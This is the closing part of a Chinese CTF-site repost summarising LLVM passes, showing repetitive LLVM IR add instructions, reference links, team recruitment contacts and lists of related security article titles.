20000000000000  %254 = add nsw i64 %253, 20000000000000  %255 = add nsw i64 %254, 20000000000000  %256 = add nsw i64 %255, 20000000000000  %257 = add nsw i64 %256, 20000000000000  %258 = add nsw i64 %257, 20000000000000  %259 = add nsw i64 %258, 20000000000000  %260 = add nsw i64 %259, 20000000000000  %261 = add nsw i64 %260, 20000000000000  %262 = add nsw i64 %261, 20000000000000  %263 = add nsw i64 %262, 20000000000000  %264 = add nsw i64 %263, 20000000000000  %265 = add nsw i64 %264, 20000000000000  %266 = add nsw i64 %265, 20000000000000  %267 = add nsw i64 %266, 20000000000000  %268 = add nsw i64 %267, 20000000000000  %269 = add nsw i64 %268, 20000000000000  %270 = add nsw i64 %269, 20000000000000  %271 = add nsw i64 %270, 20000000000000  %272 = add nsw i64 %271, 20000000000000  %273 = add nsw i64 %272, 20000000000000  %274 = add nsw i64 %273, 20000000000000  %275 = add nsw i64 %274, 20000000000000  %276 = add nsw i64 %275, 20000000000000  %277 = add nsw i64 %276, 20000000000000  %278 = add nsw i64 %277, 20000000000000  %279 = add nsw i64 %278, 20000000000000  %280 = add nsw i64 %279, 20000000000000  %281 = add nsw i64 %280, 20000000000000  %282 = add nsw i64 %281, 20000000000000  %283 = add nsw i64 %282, 20000000000000  %284 = add nsw i64 %283, 20000000000000  %285 = add nsw i64 %284, 20000000000000  %286 = add nsw i64 %285, 20000000000000  %287 = add nsw i64 %286, 20000000000000  %288 = add nsw i64 %287, 20000000000000  %289 = add nsw i64 %288, 20000000000000  %290 = add nsw i64 %289, 20000000000000  %291 = add nsw i64 %290, 20000000000000  %292 = add nsw i64 %291, 20000000000000  %293 = add nsw i64 %292, 20000000000000  %294 = add nsw i64 %293, 20000000000000  %295 = add nsw i64 %294, 20000000000000  %296 = add nsw i64 %295, 20000000000000  %297 = add nsw i64 %296, 20000000000000  %298 = add nsw i64 %297, 20000000000000  %299 = add nsw i64 %298, 20000000000000  %300 = add nsw i64 %299, 20000000000000  %301 = add nsw i64 %300, 20000000000000  %302 = add nsw i64 %301, 20000000000000  %303 = add nsw i64 %302, 20000000000000  %304 = add nsw i64 %303, 20000000000000  %305 = add nsw i64 %304, 20000000000000  %306 = add nsw i64 %305, 20000000000000  %307 = add nsw i64 %306, 20000000000000  %308 = add nsw i64 %307, 20000000000000  %309 = add nsw i64 %308, 20000000000000  %310 = add nsw i64 %309, 20000000000000  %311 = add nsw i64 %310, 20000000000000  %312 = add nsw i64 %311, 20000000000000  %313 = add nsw i64 %312, 20000000000000  %314 = add nsw i64 %313, 20000000000000  %315 = add nsw i64 %314, 1  ret i64 %315}

参考文章:

  • https://lakwsh.net/?p=457

  • https://blog.csdn.net/weixin_46483787/article/details/125199780

  • https://blog.csdn.net/qq_39948058/article/details/119938973

  • https://www.anquanke.com/post/id/240748#h2-10

原文链接:https://blog.e4l4.com/posts/id=31/

文末:

欢迎师傅们加入我们:

星盟安全团队纳新群1:222328705

星盟安全团队纳新群2:346014666

有兴趣的师傅欢迎一起来讨论!

llvm pass总结

原文始发于微信公众号(星盟安全):llvm pass总结

版权声明:admin 发表于 2023年8月20日 上午9:23。
转载请注明:llvm pass总结 | CTF导航

相关文章

每周云安全资讯-2022年第38周
admin
517
CVE-2023-27524:Apache Superset未授权访问漏洞
admin
417
每周云安全资讯-2022年第30周
admin
584
免杀捆绑器,过主流杀软。A Bundler bypass anti-virus
admin
787
CVE-2023-32315从未授权到RCE复现分析
admin
433
我是如何利用环境变量注入执行任意命令
admin
2,135

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0